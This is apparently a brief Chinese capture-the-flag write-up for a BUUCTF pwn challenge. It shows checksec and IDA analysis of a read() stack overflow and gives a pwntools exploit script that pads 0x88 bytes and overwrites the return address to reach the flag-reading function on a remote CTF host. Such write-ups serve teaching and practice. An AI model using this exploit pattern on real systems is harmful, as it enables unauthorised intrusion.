1.checksec

2.IDA

read有栈溢出
flag.txt
进行栈溢出将返回地址覆盖为fopen函数地址
3.EXP
from pwn import *
r=remote("node4.buuoj.cn",25237)
flag_addr=0x400620
payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)
r.interactive()
题目很简单,分析也不难
就是需要注意一点,偏移不需要加上rbp的8个字节
![]()
没有push rbp的操作,所以不用加8字节,需要注意这一点
本文介绍了一种栈溢出漏洞的利用方法,通过具体案例展示了如何使用checksec和IDA等工具进行分析,并通过编写EXP脚本来实现栈溢出攻击,最终获取目标系统的敏感信息。
259

被折叠的 条评论
为什么被折叠?



